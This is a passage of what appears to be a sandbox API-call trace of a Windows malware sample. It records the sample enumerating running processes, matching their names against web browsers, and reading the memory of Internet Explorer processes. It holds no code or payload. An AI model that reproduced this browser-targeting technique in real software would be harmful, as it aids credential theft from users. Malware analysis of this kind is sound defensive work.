	[0224.507] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0224.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.507] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.507] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0224.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.507] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.508] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0224.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5a7c
	[0224.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.509] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0224.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.509] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.509] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0224.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.510] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.510] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0224.511] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x5a80
	[0224.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.511] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0224.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.511] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.511] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0224.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.512] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.512] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0224.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0224.513] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0224.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x5a84
	[0224.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.513] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0224.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.514] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.515] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0224.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.515] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.522] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0224.523] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5a88
	[0224.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.524] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0224.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.524] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.524] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0224.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.525] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.525] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0224.526] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5a8c
	[0224.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.526] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0224.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.526] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.527] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0224.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.527] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.527] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0224.528] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5a90
	[0224.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.529] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0224.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.529] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.529] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0224.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.530] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.530] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0224.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x5a94
	[0224.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.531] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0224.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.532] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.532] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0224.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.533] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.533] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0224.534] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x5a98
	[0224.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.534] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0224.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.534] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.535] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0224.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.535] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.535] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0224.536] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5a9c
	[0224.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.536] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0224.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.536] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.537] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0224.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.537] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.538] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0224.538] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5aa0
	[0224.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.538] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0224.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.539] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.539] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0224.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.540] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.540] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0224.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x5aa4
	[0224.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.541] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0224.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.541] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.542] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0224.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.542] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.542] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0224.543] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x5aa8
	[0224.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.543] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0224.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.543] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.544] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0224.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.544] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.544] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0224.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5aac
	[0224.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.545] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0224.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.546] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.546] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0224.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.547] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.548] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0224.548] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5ab0
	[0224.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.548] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0224.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.549] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.550] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0224.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.550] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.551] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0224.551] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5ab4
	[0224.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.552] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0224.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.552] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.553] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0224.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.553] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.553] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0224.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x5ab8
	[0224.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.554] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0224.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.555] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.555] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0224.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.556] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.557] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0224.557] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x5abc
	[0224.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.557] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0224.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.558] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.558] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0224.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.559] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.559] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0224.560] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5ac0
	[0224.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.560] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0224.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.560] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0224.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.561] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0224.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.561] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.561] NtQueryInformationProcess (in: ProcessHandle=0x5ac0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0224.561] ReadProcessMemory (in: hProcess=0x5ac0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0224.562] ReadProcessMemory (in: hProcess=0x5ac0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0224.562] ReadProcessMemory (in: hProcess=0x5ac0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0224.562] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0224.562] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0224.563] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5ac4
	[0224.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.563] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0224.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.564] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0224.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.564] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0224.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.564] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.565] NtQueryInformationProcess (in: ProcessHandle=0x5ac4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0224.565] ReadProcessMemory (in: hProcess=0x5ac4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0224.565] ReadProcessMemory (in: hProcess=0x5ac4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0224.565] ReadProcessMemory (in: hProcess=0x5ac4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0224.565] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0224.565] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0224.566] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x5ac8
	[0224.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.566] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0224.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.566] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.567] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0224.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.567] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.567] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0224.568] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x5acc
	[0224.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.568] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0224.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.568] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.569] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0224.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.569] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.569] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.570] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5ad0
	[0224.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.570] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.570] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
